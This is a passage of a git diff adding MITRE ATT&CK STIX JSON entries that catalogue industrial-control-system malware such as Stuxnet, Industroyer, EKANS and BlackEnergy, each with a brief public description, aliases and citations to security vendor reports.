"https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/" + }, + { + "source_name": "FireEye APT33 Sept 2017", + "description": "O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + }, + { + "source_name": "Symantec Elfin Mar 2019", + "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.", + "url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5.json new file mode 100644 index 0000000000000000000000000000000000000000..1d75218596afdd9aa15c48582e29d0d858784363 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5.json @@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--fa8e6294-60d7-45f2-800e-038db9f8edf2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:04:48.834Z", + "name": "EKANS", + "description": "[EKANS](https://attack.mitre.org/software/S0605) is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://attack.mitre.org/software/S0605) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in [MegaCortex](https://attack.mitre.org/software/S0576).(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_aliases": [ + "EKANS", + "SNAKEHOSE" + ], + "type": "malware", + "id": "malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5", + "created": "2021-02-12T20:07:42.883Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0605", + "external_id": "S0605" + }, + { + "source_name": "EKANS", + "description": "(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)(Citation: FireEye Ransomware Feb 2020)" + }, + { + "source_name": "SNAKEHOSE", + "description": "(Citation: FireEye Ransomware Feb 2020)" + }, + { + "source_name": "Dragos EKANS", + "description": "Dragos. (2020, February 3). EKANS Ransomware and ICS Operations. Retrieved February 9, 2021.", + "url": "https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" + }, + { + "source_name": "Palo Alto Unit 42 EKANS", + "description": "Hinchliffe, A. Santos, D. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021.", + "url": "https://unit42.paloaltonetworks.com/threat-assessment-ekans-ransomware/" + }, + { + "source_name": "FireEye Ransomware Feb 2020", + "description": "Zafra, D., et al. (2020, February 24). Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT. Retrieved March 2, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--083bb47b-02c8-4423-81a2-f9ef58572974.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--083bb47b-02c8-4423-81a2-f9ef58572974.json new file mode 100644 index 0000000000000000000000000000000000000000..4715dccf53ab14911473bb44d5e7534e2e204551 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--083bb47b-02c8-4423-81a2-f9ef58572974.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--1839570a-8279-474a-9c50-e53609c106e4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T17:18:25.971Z", + "name": "Backdoor.Oldrea", + "description": "[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a modular backdoor that used by [Dragonfly](https://attack.mitre.org/groups/G0035) against energy companies since at least 2013. [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)(Citation: Symantec Dragonfly Sept 2017)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_aliases": [ + "Backdoor.Oldrea", + "Havex" + ], + "type": "malware", + "id": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "created": "2017-05-31T21:32:59.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0093", + "external_id": "S0093" + }, + { + "source_name": "Gigamon Berserk Bear October 2021", + "description": "Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE\u2019S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.", + "url": "https://vblocalhost.com/uploads/VB2021-Slowik.pdf" + }, + { + "source_name": "Symantec Dragonfly Sept 2017", + "description": "Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.", + "url": "https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers" + }, + { + "source_name": "Symantec Dragonfly", + "description": "Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", + "url": "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--088f1d6e-0783-47c6-9923-9c79b2af43d4.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--088f1d6e-0783-47c6-9923-9c79b2af43d4.json new file mode 100644 index 0000000000000000000000000000000000000000..df3f1f0ecd71636e2fcc90d5a76f719a38025aab --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--088f1d6e-0783-47c6-9923-9c79b2af43d4.json @@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--b157423a-32e7-446a-b821-04f30e477968", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T13:50:55.168Z", + "name": "Stuxnet", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) ", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "Stuxnet", + "W32.Stuxnet" + ], + "type": "malware", + "id": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "created": "2020-12-14T17:34:58.457Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0603", + "external_id": "S0603" + }, + { + "source_name": "W32.Stuxnet", + "description": "(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) " + }, + { + "source_name": "CISA ICS Advisory ICSA-10-272-01", + "description": "CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020.", + "url": "https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01" + }, + { + "source_name": "ESET Stuxnet Under the Microscope", + "description": "Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.", + "url": "https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf" + }, + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + }, + { + "source_name": "Langer Stuxnet", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--1d8dccb3-e779-4702-aeb1-6627a22cc585.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--1d8dccb3-e779-4702-aeb1-6627a22cc585.json new file mode 100644 index 0000000000000000000000000000000000000000..34a511998d87d46cb32b39505cbf89325863174e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--1d8dccb3-e779-4702-aeb1-6627a22cc585.json @@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--11d7ae20-2dac-40dc-b3e9-011cdab559ba", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "Industroyer", + "CRASHOVERRIDE" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "Industroyer", + "description": "[Industroyer](https://collaborate.mitre.org/attackics/index.php/Software/S0001) is a sophisticated piece of malware designed to cause an [Impact](https://collaborate.mitre.org/attackics/index.php/Impact) to the working processes of Industrial Control Systems (ICS), specifically ICSs used in electrical substations.(Citation: ESET Win32/Industroyer) Industroyer was alleged to be used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride)(Citation: CISA Alert (TA17-163A))(Citation: Dragos Crashoverride 2018)(Citation: Dragos Crashoverride 2019)", + "id": "malware--1d8dccb3-e779-4702-aeb1-6627a22cc585", + "type": "malware", + "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31T21:33:21.973Z", + "modified": "2021-10-21T14:00:00.188Z", + "external_references": [ + { + "external_id": "S1004", + "source_name": "mitre-ics-attack", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0001" + }, + { + "source_name": "ESET Win32/Industroyer", + "description": "Anton Cherepanov, ESET. (2017, June 12). Win32/Industroyer: A new threat for industrial control systems. Retrieved September 15, 2017.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + }, + { + "source_name": "Dragos Crashoverride", + "description": "Dragos Inc.. (2017, June 13). Industroyer - Dragos - 201706: Analysis of the Threat to Electic Grid Operations. Retrieved September 18, 2017.", + "url": "https://www.dragos.com/wp-content/uploads/CrashOverride-01.pdf" + }, + { + "source_name": "CISA Alert TA17-163A CrashOverride June 2017", + "description": "CISA. (2017, June 12). Alert (TA17-163A). Retrieved October 22, 2019.", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA17-163A" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Dragos. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved October 14, 2019.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + }, + { + "source_name": "Dragos Crashoverride 2019", + "description": "Joe Slowik. (2019, August 15). CRASHOVERRIDE: Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack. Retrieved October 22, 2019.", + "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--242622ca-3903-43d5-8aa0-3bbdaa3020ec.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--242622ca-3903-43d5-8aa0-3bbdaa3020ec.json new file mode 100644 index 0000000000000000000000000000000000000000..5f1eb9fc5e1d70459176d9811b2929e2c2cf8557 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--242622ca-3903-43d5-8aa0-3bbdaa3020ec.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--38736127-7364-46ec-8bac-dc13ce2b1580", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "Bad Rabbit", + "Diskcoder.D" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "Bad Rabbit", + "description": "[Bad Rabbit](https://collaborate.mitre.org/attackics/index.php/Software/S0005) is a self-propagating (\u201cwormable\u201d) ransomware that affected the transportation sector in Ukraine. (Citation: ESET Bad Rabbit Oct 2017)", + "type": "malware", + "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "malware--242622ca-3903-43d5-8aa0-3bbdaa3020ec", + "created": "2017-05-31T21:32:59.661Z", + "modified": "2021-10-21T14:00:00.188Z", + "external_references": [ + { + "external_id": "S1001", + "source_name": "mitre-ics-attack", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0005" + }, + { + "description": "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", + "source_name": "ESET Bad Rabbit Oct 2017", + "url": "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/" + }, + { + "description": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov. (2017, October 27). Bad Rabbit Ransomware. Retrieved October 27, 2019.", + "source_name": "Kaspersky Bad Rabbit Oct 2017", + "url": "https://securelist.com/bad-rabbit-ransomware/82851/" + }, + { + "description": "Joe Slowik. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved October 27, 2019.", + "source_name": "Dragos IT Ransomware for ICS Environments Apr 2019", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a.json new file mode 100644 index 0000000000000000000000000000000000000000..db3d6948b066852cb6e3756a09cb7101ba438fc7 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--d8fc0555-f3d0-4619-b6ff-eaabddced37f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T17:29:57.200Z", + "name": "Bad Rabbit", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware) ", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Bad Rabbit", + "Win32/Diskcoder.D" + ], + "type": "malware", + "id": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "created": "2021-02-09T14:35:39.455Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0606", + "external_id": "S0606" + }, + { + "source_name": "ESET Bad Rabbit", + "description": "M.L\u00e9veille, M-E.. (2017, October 24). Bad Rabbit: Not\u2011Petya is back with improved ransomware. Retrieved January 28, 2021.", + "url": "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/" + }, + { + "source_name": "Secure List Bad Rabbit", + "description": "Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021.", + "url": "https://securelist.com/bad-rabbit-ransomware/82851/" + }, + { + "source_name": "Dragos IT ICS Ransomware", + "description": "Slowik, J.. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved January 28, 2021.", + "url": "https://www.dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--496bff4d-0700-4b28-b06f-f30a63002be7.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--496bff4d-0700-4b28-b06f-f30a63002be7.json new file mode 100644 index 0000000000000000000000000000000000000000..8207e961b4b52199aa9c27bf4f1eb4d598efd948 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--496bff4d-0700-4b28-b06f-f30a63002be7.json @@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--eef19592-11e6-4fc3-a557-25f0848e5421", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "Stuxnet" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "Stuxnet", + "description": "[Stuxnet](https://collaborate.mitre.org/attackics/index.php/Software/S0010) was the first publicly reported piece of malware to specifically target industrial control systems devices. Stuxnet is a large and complex piece of malware that utilized multiple different complex tactics including multiple zero-day vulnerabilites, a sophisticated Windows rootkit, and network infection routines.(Citation: Wired W32.Stuxnet Dossier Feb 2011)(Citation: Symantec W32.Stuxnet Writeup)(Citation: CISA ICS Advisory (ICSA-10-238-01B))(Citation: SCADAhacker Stuxnet Mitigation Jan 2014)", + "id": "malware--496bff4d-0700-4b28-b06f-f30a63002be7", + "x_mitre_version": "1.0", + "type": "malware", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-03-26T15:02:14.907Z", + "modified": "2021-10-21T14:00:00.188Z", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "external_id": "S1008", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0010" + }, + { + "source_name": "Wired W32.Stuxnet Dossier Feb 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017.", + "url": "https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf" + }, + { + "source_name": "Symantec W32.Stuxnet Writeup", + "description": "Jarrad Shearer. (n.d.). W32.Stuxnet Writeup. Retrieved October 22, 2019.", + "url": "https://www.symantec.com/security-center/writeup/2010-071400-3123-99" + }, + { + "source_name": "CISA ICS Advisory ICSA-10-238-01B Stuxnet January 2014", + "description": "CISA. (2014, January 08). Stuxnet Malware Mitigation (Update B). Retrieved October 22, 2019.", + "url": "https://www.us-cert.gov/ics/advisories/ICSA-10-238-01B" + }, + { + "source_name": "SCADAhacker Stuxnet Mitigation Jan 2014", + "description": "Joel Langill. (2014, January 21). Stuxnet Mitigation. Retrieved October 22, 2019.", + "url": "https://scadahacker.com/resources/stuxnet-mitigation.html" + }, + { + "source_name": "Langer Stuxnet Analysis Nov 2013", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved March 27, 2018.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--49c04994-1035-4b58-89b7-cf8956e3b423.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--49c04994-1035-4b58-89b7-cf8956e3b423.json new file mode 100644 index 0000000000000000000000000000000000000000..a37e42b84cd2e81d743914f900a9cb28d19496cd --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--49c04994-1035-4b58-89b7-cf8956e3b423.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--cf631640-1f28-441b-931c-119c4b07efaa", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "Conficker", + "Downadup", + "Kido" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "Conficker", + "description": "[Conficker](https://collaborate.mitre.org/attackics/index.php/Software/S0012) is a computer worm that targets Microsoft Windows and was first detected in November 2008. It targets a vulnerability (MS08-067) in Windows OS software and dictionary attacks on administrator passwords to propagate while forming a botnet. Conficker made its way onto computers and removable disk drives in a nuclear power plant. (Citation: Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary)", + "type": "malware", + "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "malware--49c04994-1035-4b58-89b7-cf8956e3b423", + "created": "2017-05-31T21:32:59.661Z", + "modified": "2021-10-21T14:00:00.188Z", + "external_references": [ + { + "external_id": "S1003", + "source_name": "mitre-ics-attack", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0012" + }, + { + "description": "Catalin Cimpanu. (2016, April 26). Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary. Retrieved October 14, 2019.", + "source_name": "Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary", + "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml" + }, + { + "description": "Symantec. (2015, June 30). Simple steps to protect yourself from the Conficker Worm. Retrieved December 5, 2019.", + "source_name": "Symantec Conficker Jun 2015", + "url": "https://support.symantec.com/us/en/article.tech93179.html" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe.json new file mode 100644 index 0000000000000000000000000000000000000000..39095c517aca0b8067320bef9081b6034aaee1e8 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--9683e341-d9dd-42ee-8e84-8a9db39ad4dd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T17:59:55.276Z", + "name": "PLC-Blaster", + "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006) is a piece of proof-of-concept malware that runs on Siemens S7 PLCs. This worm locates other Siemens S7 PLCs on the network and attempts to infect them. Once this worm has infected its target and attempted to infect other devices on the network, the worm can then run one of many modules. (Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016) (Citation: Spenneberg, Ralf 2016) ", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "PLC-Blaster" + ], + "type": "malware", + "id": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "created": "2019-03-26T15:02:14.907Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1006", + "external_id": "S1006" + }, + { + "source_name": "Spenneberg, Ralf 2016", + "description": "Spenneberg, Ralf 2016 PLC-Blaster Retrieved. 2019/06/06 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf" + }, + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/malware/malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4.json b/cti-ATT-CK-v13.1/ics-attack/malware/malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4.json new file mode 100644 index 0000000000000000000000000000000000000000..aca89721a1cbc0a763ffbcfa7f81bd6580281352 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/malware/malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--f58b61b1-5240-43de-82e3-4b05cf24fd6b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T17:33:00.482Z", + "name": "BlackEnergy", + "description": "[BlackEnergy](https://attack.mitre.org/software/S0089) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. (Citation: F-Secure BlackEnergy 2014)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "BlackEnergy", + "Black Energy" + ], + "type": "malware", + "id": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4", + "created": "2017-05-31T21:32:57.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0089", + 